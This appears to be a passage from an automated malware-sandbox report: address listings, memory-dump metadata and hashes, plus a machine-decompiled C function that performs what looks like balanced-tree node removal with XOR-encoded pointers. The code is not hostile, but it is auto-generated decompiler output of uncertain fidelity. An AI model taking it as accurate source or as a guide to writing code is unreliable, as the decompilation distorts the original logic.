                                        0x1e3d27c7
                                        0x1e415c74
                                        0x1e415c79
                                        0x1e415c79
                                        0x1e3d27c7
                                        0x00000000
                                        0x1e3d26c0
                                        0x1e3d26c0
                                        0x1e3d26c3
                                        0x1e3d26c6
                                        0x1e3d26c6
                                        0x1e3d26c9
                                        0x1e3d26c9
                                        0x00000000
                                        0x1e3d26c9
                                        0x1e3d26ba
                                        0x1e3d265b
                                        0x1e3d265b
                                        0x1e3d265e
                                        0x1e3d2667
                                        0x1e3d266d
                                        0x1e3d2677
                                        0x1e3d267c
                                        0x1e3d267f
                                        0x1e3d2681
                                        0x1e415b49
                                        0x1e415b4e
                                        0x1e3d27cd
                                        0x1e3d27d0
                                        0x1e3d27d1
                                        0x1e3d27d2
                                        0x1e3d27d4
                                        0x1e3d27dd
                                        0x1e3d2687
                                        0x1e3d2687
                                        0x1e3d268a
                                        0x1e3d268b
                                        0x1e3d268e
                                        0x1e3d268f
                                        0x1e3d2691
                                        0x1e3d2696
                                        0x1e3d2698
                                        0x1e3d269d
                                        0x1e3d269f
                                        0x00000000
                                        0x1e3d269f
                                        0x1e3d2681
                                        0x00000000
                                        0x00000000
                                        0x1e3d2846
                                        0x00000000
                                        0x00000000
                                        0x1e3d2605
                                        0x1e3d260a
                                        0x1e3d260c
                                        0x1e3d2611
                                        0x1e3d2616
                                        0x1e3d2619
                                        0x1e3d2619
                                        0x1e3d261e
                                        0x00000000
                                        0x1e3d2624
                                        0x1e3d2627
                                        0x1e3d2627
                                        0x00000000
                                        0x00000000
                                        0x1e415b1f
                                        0x00000000
                                        0x00000000
                                        0x1e3d2894
                                        0x1e3d289b
                                        0x1e3d289d
                                        0x1e3d28a1
                                        0x1e415b2b
                                        0x1e415b2e
                                        0x1e415b2e
                                        0x1e3d28a7
                                        0x1e3d28a9
                                        0x1e415b04
                                        0x1e415b09
                                        0x1e415b09
                                        0x1e415b09
                                        0x00000000
                                        0x00000000
                                        0x1e415b35
                                        0x1e415b3c
                                        0x1e3d28fb
                                        0x1e3d28fb
                                        0x1e3d26cc
                                        0x1e3d26cc
                                        0x1e3d26d0
                                        0x00000000
                                        0x1e3d26d2
                                        0x1e3d26d2
                                        0x00000000
                                        0x1e3d26d2
                                        0x00000000
                                        0x00000000
                                        0x1e3d25fe
                                        0x1e3d292d
                                        0x1e3d292d
                                        0x1e3d2930
                                        0x1e3d2935
                                        0x1e3d2937
                                        0x1e3d293c
                                        0x1e3d293d
                                        0x1e3d293f
                                        0x1e3d2946
                                        0x1e3d294d
                                        0x1e3d294e
                                        0x1e3d2950
                                        0x1e3d2951
                                        0x1e3d2951
                                        0x1e3d2952
                                        0x1e3d2958
                                        0x1e3d295b
                                        0x1e3d2960
                                        0x1e3d2963
                                        0x1e3d2968
                                        0x1e3d2969
                                        0x1e3d296a
                                        0x1e3d2970
                                        0x1e3d2971
                                        0x1e3d2974
                                        0x1e3d2977
                                        0x1e3d297c
                                        0x1e3d297d
                                        0x1e3d297e
                                        0x1e3d297f
                                        0x1e3d2980
                                        0x1e3d2981
                                        0x1e3d2982
                                        0x1e3d2983
                                        0x1e3d2984
                                        0x1e3d2985
                                        0x1e3d2986
                                        0x1e3d2987
                                        0x1e3d2988
                                        0x1e3d2989
                                        0x1e3d298a
                                        0x1e3d298b
                                        0x1e3d298c
                                        0x1e3d298d
                                        0x1e3d298e
                                        0x1e3d298f
                                        0x1e3d2990
                                        0x1e3d2992
                                        0x1e3d2997
                                        0x1e3d29a3
                                        0x1e3d29a6
                                        0x1e3d29ab
                                        0x1e3d29ad
                                        0x1e3d29b0
                                        0x1e3d29b2
                                        0x1e415c80
                                        0x1e3d29b8
                                        0x1e3d29b8
                                        0x1e3d29bb
                                        0x1e3d29c0
                                        0x1e3d29c5
                                        0x1e3d29c6
                                        0x1e3d29c6
                                        0x1e3d29c9
                                        0x1e3d29cb
                                        0x00000000
                                        0x00000000
                                        0x1e3d29cd
                                        0x1e3d29d0
                                        0x1e3d29d9
                                        0x1e3d29db
                                        0x1e3d29dd
                                        0x1e3d2a7f
                                        0x1e3d2a84
                                        0x1e3d2a87
                                        0x1e3d2a89
                                        0x1e415ca1
                                        0x1e415ca3
                                        0x00000000
                                        0x1e3d2a8f
                                        0x1e3d2a8f
                                        0x00000000
                                        0x1e3d2a8f
                                        0x00000000
                                        0x1e3d29e3
                                        0x1e3d29e3
                                        0x1e3d29e3
                                        0x00000000
                                        0x1e3d29e3
                                        0x1e3d29dd
                                        0x00000000
                                        0x1e3d29db
                                        0x1e3d29e6
                                        0x1e3d29e9
                                        0x1e3d29eb
                                        0x1e3d29ed
                                        0x1e3d29f3
                                        0x1e3d29f5
                                        0x1e3d29f8
                                        0x1e3d29fa
                                        0x1e3d2a97
                                        0x1e3d2a9a
                                        0x1e3d2a9d
                                        0x1e3d2add
                                        0x00000000
                                        0x1e3d2a9f
                                        0x1e3d2aa2
                                        0x1e3d2aa5
                                        0x1e3d2aa8
                                        0x1e3d2aab
                                        0x1e415cab
                                        0x1e415caf
                                        0x1e415cc5
                                        0x1e415cda
                                        0x1e415cdc
                                        0x1e415cdf
                                        0x1e415ce5
                                        0x00000000
                                        0x1e415ceb
                                        0x1e415ced
                                        0x1e415cee
                                        0x00000000
                                        0x1e415cee
                                        0x1e415cb1
                                        0x1e415cb4
                                        0x1e415cb9
                                        0x1e415cbb
                                        0x00000000
                                        0x1e415cbd
                                        0x1e415cbd
                                        0x00000000
                                        0x1e415cbd
                                        0x1e415cbb
                                        0x1e3d2ab1
                                        0x1e3d2ab1
                                        0x1e3d2ac4
                                        0x1e3d2ac6
                                        0x1e3d2ac6
                                        0x00000000
                                        0x1e3d2ac6
                                        0x1e3d2aab
                                        0x00000000
                                        0x1e3d2a00
                                        0x1e3d2a09
                                        0x1e3d2a0e
                                        0x1e3d2a21
                                        0x1e3d2a24
                                        0x1e3d2a35
                                        0x1e3d2a3a
                                        0x1e3d2a3d
                                        0x1e3d2a42
                                        0x1e3d2a59
                                        0x1e3d2a59
                                        0x1e3d2a5c
                                        0x1e3d2a5f
                                        0x1e3d2a5f
                                        0x1e3d29fa
                                        0x1e3d29f3
                                        0x1e3d2a64
                                        0x1e3d2a64
                                        0x1e3d2a6b
                                        0x1e3d2a6b
                                        0x1e3d2a6d
                                        0x1e3d2a72
                                        0x1e3d2a72
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID: PATH
                                        • API String ID: 0-1036084923
                                        • Opcode ID: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
                                        • Instruction ID: ca3ba7ddd2bbc8decde1601b7282267ecc70d950a386f2030515d9f234ffeaec
                                        • Opcode Fuzzy Hash: 1bdcb8070d9471ccf7fbae13a7332380e65c8477ac2325fc0249dfabc85de32d
                                        • Instruction Fuzzy Hash: 87C1A0B6D00319DBDB14CF99D880AADB7B5FF48B20F85461AE801BB250E775A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3AF900, Relevance: .9, Instructions: 863COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 99%
                                        			E1E3AF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}








































































































                                        0x1e3af90b
                                        0x1e3af911
                                        0x1e3af917
                                        0x1e3af919
                                        0x1e3af91c
                                        0x1e405d63
                                        0x1e405d69
                                        0x1e405d69
                                        0x1e405d63
                                        0x1e3af922
                                        0x1e3af927
                                        0x1e405d72
                                        0x1e405d78
                                        0x1e405d78
                                        0x1e405d72
                                        0x1e3af92d
                                        0x1e3af931
                                        0x1e3afa2d
                                        0x1e3afa2d
                                        0x1e3af939
                                        0x1e3af940
                                        0x1e3af944
                                        0x1e3afa37
                                        0x1e3afa39
                                        0x1e3afa3c
                                        0x1e3afa3e
                                        0x1e3afa41
                                        0x1e3afa48
                                        0x1e3afe68
                                        0x1e3afe6c
                                        0x1e3afe6c
                                        0x1e3afe78
                                        0x1e3afe78
                                        0x1e3afe7a
                                        0x1e3afe7a
                                        0x1e3afe7e
                                        0x1e3afe6e
